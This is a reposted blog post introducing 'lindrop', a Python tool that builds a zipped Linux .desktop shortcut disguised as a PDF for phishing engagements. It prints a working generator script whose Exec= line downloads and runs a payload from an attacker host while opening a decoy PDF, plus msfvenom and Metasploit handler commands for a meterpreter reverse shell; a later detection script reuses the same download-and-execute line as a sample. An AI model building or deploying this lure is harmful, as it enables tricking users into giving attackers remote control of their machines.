
lindrop a social engineering vector for linux targets

[Category: Linux | Posted by: 店小二03 | Date: 2016 | Author: 红领巾]

A quick-and-dirty Python utility that generates a zip containing a "malicious" .desktop (aka shortcut) file that masquerades as a PDF file (not really, sort of). This is probably nothing new, but I needed a way to specifically target Linux users for certain social engineering engagements, where I could send a zip file via email and generate something on the fly. So I came up with this quick mess of a tool.

It basically abuses the "Exec" key of a .desktop file to:

1. Download a PDF and display it to the user.

2. Download and execute a linux/x86/meterpreter/reverse_tcp payload.

There's some really old-school basic obfuscation involved in the creation of the .desktop file. First, the file name is generated with a run of spaces between the .pdf and .desktop extensions. This pushes the real extension out of view when the .zip is opened straight-up in Archive Manager:


[screenshot]

Second, there are a bunch of newlines ('\n') in the .desktop file itself, so if it's double-clicked from inside Archive Manager, nothing too obvious shows unless you scroll all the way down (aside from the fact that it's clearly not a PDF, lol).


[screenshot]

Another thing to note is the "Icon" key. This contains a reference to a local SVG file that gives the .desktop shortcut its icon. In this case, we're using an icon that ships with GNOME and is associated with PDF files. If that SVG file doesn't exist on the target system, the file will show up with a generic executable icon, blowing its amazing cover story of being a PDF.

Anyway…on to the tool…

Lindrop takes 4 inputs:

1. An output name for the "PDF" (.desktop) file that will be in the zip.

2. An output name for the ZIP file.

3. A remote payload URL (e.g., http://www.attacker.com/payload). This will be downloaded to the /tmp directory on the target box. For this example, we're simply creating a payload with msfvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload

4. A remote PDF to download and display to the user. In this example, we're remotely loading Black Hat 2016's attendee survey: https://www.blackhat.com/docs/us-16/2016-Black-Hat-Attendee-Survey.pdf. Behind the scenes, Xpdf is used to open the PDF file.
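As an added example (my own reconstruction, not the lindrop gist linked at the end of the post), here is how the pieces described above fit together in Python: the space-padded file name, the blank-line padding in front of Exec=, the GNOME PDF icon, and an Exec= that fetches the decoy PDF and the payload into /tmp, runs the payload and opens the decoy in xpdf. The icon path, the amount of padding, the /tmp file names and the attacker URL are assumptions taken after the post; the Exec= quoting follows the Desktop Entry spec. Nothing here touches the network, it only writes the zip.

```python
"""Added example, not the lindrop gist: build a PDF-looking .desktop lure and
zip it, using the tricks the post describes (space-padded extension, blank-line
padding, GNOME PDF icon, Exec= that fetches and runs). The URLs, icon path and
/tmp file names are placeholders taken from or assumed after the post."""
from __future__ import annotations
import shlex
import tempfile
import zipfile
from pathlib import Path

PDF_URL = "https://www.blackhat.com/docs/us-16/2016-Black-Hat-Attendee-Survey.pdf"
PAYLOAD_URL = "http://www.attacker.com/payload"  # placeholder host from the post
# Assumed location of the GNOME PDF mimetype icon; if it is missing on the
# target, the launcher shows a generic executable icon instead.
PDF_ICON = "/usr/share/icons/gnome/scalable/mimetypes/application-pdf.svg"
NEWLINE_PAD = 40  # blank lines pushed in front of Exec= so a quick preview looks harmless


def lure_filename(base: str, spaces: int = 60) -> str:
    """'survey.pdf' + a run of spaces + '.desktop'. Archive Manager shows the
    start of the name, so the real extension ends up out of view."""
    return f"{base}.pdf{' ' * spaces}.desktop"


def desktop_escape(arg: str) -> str:
    """Quote one Exec= argument per the Desktop Entry spec: literal % becomes
    %%, the argument is wrapped in double quotes, and backslash, double quote,
    backtick and $ are backslash-escaped (backslash first so the rest are not
    doubled)."""
    arg = arg.replace("%", "%%")
    for ch in ("\\", '"', "`", "$"):
        arg = arg.replace(ch, "\\" + ch)
    return f'"{arg}"'


def exec_line(pdf_url: str, payload_url: str) -> str:
    """The shell the launcher runs: fetch the decoy PDF and the payload into
    /tmp, make the payload executable, background it, then open the decoy with
    xpdf so the user sees what they expected. shlex.quote keeps URL
    metacharacters from breaking the inner sh -c."""
    cmd = (
        f"wget -q -O /tmp/temp.pdf {shlex.quote(pdf_url)}; "
        f"wget -q -O /tmp/pl892 {shlex.quote(payload_url)}; "
        "chmod +x /tmp/pl892; /tmp/pl892 & xpdf /tmp/temp.pdf"
    )
    return "Exec=sh -c " + desktop_escape(cmd)


def desktop_entry(display_name: str, pdf_url: str, payload_url: str,
                  icon: str = PDF_ICON) -> str:
    """Harmless-looking header, then NEWLINE_PAD blank lines (the spec ignores
    them), then the Exec= key. A trusted launcher is listed under its Name=,
    not its file name, so Name= repeats the fake .pdf name."""
    header = ["[Desktop Entry]", "Type=Application", f"Name={display_name}",
              f"Icon={icon}", "Terminal=false"]
    return "\n".join(header) + "\n" * (NEWLINE_PAD + 1) + exec_line(pdf_url, payload_url) + "\n"


def build_zip(zip_path: Path, entry_name: str, content: str) -> Path:
    with zipfile.ZipFile(zip_path, "w", zipfile.ZIP_DEFLATED) as zf:
        info = zipfile.ZipInfo(entry_name)
        # Store mode 0755: GNOME's file manager refuses to launch a .desktop
        # that is not executable, and file-roller restores the mode from the
        # archive on extraction (assumption: the extractor honours it).
        info.external_attr = 0o100755 << 16
        zf.writestr(info, content)
    return zip_path


def demo(out_dir: str | None = None) -> dict:
    """Build the lure into a (temporary) directory and read it back."""
    out = Path(out_dir or tempfile.mkdtemp())
    name = lure_filename("survey")
    content = desktop_entry("survey.pdf", PDF_URL, PAYLOAD_URL)
    zpath = build_zip(out / "survey.zip", name, content)
    with zipfile.ZipFile(zpath) as zf:
        info = zf.getinfo(name)
        return {"zip": str(zpath), "name": name,
                "mode": (info.external_attr >> 16) & 0o777,
                "content": zf.read(name).decode()}


if __name__ == "__main__":
    result = demo()
    print(result["zip"], repr(result["name"]))
    print(result["content"].strip().splitlines()[-1])  # the Exec= line
```

The one practical caveat worth knowing: on a stock GNOME desktop the extracted .desktop has to carry the executable bit or Nautilus will prompt instead of launching, which is why the mode is stored in the archive rather than left to the extractor's defaults.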

You should end up with a zip file, all ready to send to your target:


[screenshot]

Extracting the contents gives us a nice little quasi-"PDF" file:


[screenshot]

Executing the file, from the target's perspective, opens the Black Hat survey (or a résumé, or whichever PDF you told it to download) in Xpdf:


[screenshot]

On the attacker side, we have a listener up, using the following Metasploit resource file, waiting for a connection from the payload that the .desktop file downloaded (the one we generated earlier with msfvenom):

use exploit/multi/handler
set ExitOnSession false
set LHOST 0.0.0.0
set LPORT 6666
set PAYLOAD linux/x86/meterpreter/reverse_tcp
exploit -j


[screenshot]

Oh, this was all tested on the latest Kali Rolling, but it will probably work on most distros that handle .desktop files the same way. This code is probably buggy (it won't take spaces in any of the inputs, and there are probably other minor problems) and I'm sure it could be improved. At the moment, it just drops a "pl892" payload in the /tmp directory, along with the remote PDF file downloaded to /tmp/temp.pdf.
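For the other side of the engagement, an added example (mine, not part of the post) that triages a zip attachment for exactly the indicators described above: a document extension padded with spaces before .desktop, a .desktop entry stored with the executable bit, an Exec= that fetches into /tmp or wraps an inline shell, a document icon on a Type=Application launcher, and blank-line padding inside the entry. The regexes, icon list and thresholds are my assumptions, and the sample archive is constructed inline so it runs offline.

```python
"""Added example, not part of the original post: flag .desktop launchers that
are dressed up as documents inside a zip attachment. Indicator lists and the
blank-line threshold are assumptions, not a published ruleset."""
from __future__ import annotations
import re
import tempfile
import zipfile
from pathlib import Path

DOC_EXT = r"pdf|doc|docx|xls|xlsx|ppt|pptx|odt|txt|jpg|png"
PADDED_NAME = re.compile(rf"\.({DOC_EXT})\s+\.desktop$", re.IGNORECASE)
DOWNLOADERS = re.compile(r"\b(wget|curl|nc)\b")
DOC_ICON = re.compile(r"application-pdf|x-office-document|text-x-generic|image-x-generic",
                      re.IGNORECASE)
MAX_BLANK = 10  # a real launcher has a handful of blank lines at most


def parse_desktop(text: str) -> dict:
    """Minimal key=value reader for a .desktop file. Blank lines are counted
    rather than ignored, because the lure uses them to push Exec= off-screen."""
    keys, blank = {}, 0
    for line in text.splitlines():
        if not line.strip():
            blank += 1
            continue
        if line.startswith(("[", "#")):
            continue
        k, _, v = line.partition("=")
        keys[k.strip()] = v.strip()
    keys["_blank_lines"] = blank
    return keys


def scan_desktop(name: str, text: str, executable: bool = False) -> list[str]:
    """Return the human-readable indicators found for one .desktop entry."""
    findings = []
    if PADDED_NAME.search(name):
        findings.append("document extension padded with spaces before .desktop")
    if executable:
        findings.append("entry stored with the executable bit (launches without a prompt)")
    keys = parse_desktop(text)
    exec_ = keys.get("Exec", "")
    if DOWNLOADERS.search(exec_) and ("/tmp/" in exec_ or "chmod" in exec_):
        findings.append("Exec= fetches from the network and stages under /tmp")
    if re.search(r"\b(sh|bash)\s+-c\b", exec_):
        findings.append("Exec= wraps an inline shell script")
    if keys.get("Type") == "Application" and DOC_ICON.search(keys.get("Icon", "")):
        findings.append("Application launcher using a document icon")
    if keys["_blank_lines"] > MAX_BLANK:
        findings.append(f"{keys['_blank_lines']} blank lines inside the entry")
    return findings


def scan_zip(path) -> dict[str, list[str]]:
    """Map every .desktop entry in the archive to its findings; other files
    are skipped. Mode comes from the zip's external attributes."""
    out = {}
    with zipfile.ZipFile(path) as zf:
        for info in zf.infolist():
            if not info.filename.endswith(".desktop"):
                continue
            mode = (info.external_attr >> 16) & 0o777
            text = zf.read(info).decode("utf-8", "replace")
            out[info.filename] = scan_desktop(info.filename, text, bool(mode & 0o111))
    return out


# Constructed samples: a lure shaped like the one the post describes, and a
# normal launcher for comparison. The hosts are reserved example names.
LURE = (
    "[Desktop Entry]\nType=Application\nName=survey.pdf\n"
    "Icon=/usr/share/icons/gnome/scalable/mimetypes/application-pdf.svg\n"
    + "\n" * 30
    + 'Exec=sh -c "wget -q -O /tmp/temp.pdf http://example.invalid/a.pdf; '
      'wget -q -O /tmp/pl892 http://example.invalid/payload; chmod +x /tmp/pl892; '
      '/tmp/pl892 & xpdf /tmp/temp.pdf"\n'
)
BENIGN = "[Desktop Entry]\nType=Application\nName=Text Editor\nIcon=gedit\nExec=gedit %U\n"


def demo() -> dict[str, list[str]]:
    """Build a throwaway attachment holding both samples and scan it."""
    zpath = Path(tempfile.mkdtemp()) / "attachment.zip"
    with zipfile.ZipFile(zpath, "w") as zf:
        info = zipfile.ZipInfo("survey.pdf" + " " * 50 + ".desktop")
        info.external_attr = 0o100755 << 16  # executable, as the lure needs
        zf.writestr(info, LURE)
        zf.writestr("editor.desktop", BENIGN)
        zf.writestr("notes.txt", "nothing to see")
    return scan_zip(zpath)


if __name__ == "__main__":
    for entry, hits in demo().items():
        print(repr(entry), "->", hits or "clean")
```

Any one of these indicators is weak on its own (plenty of launchers use sh -c), but a .desktop arriving in a mail attachment with two or more of them is worth pulling aside, and the padded-name check alone catches the file-name trick without opening the entry at all.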

You can download lindrop here:

https://gist.github.com/x-42/3d822d85e6b547e7018c919c6d657e8e

Enjoy!

@0rbz_


Source page: http://www.codesec.net/view/483391.html

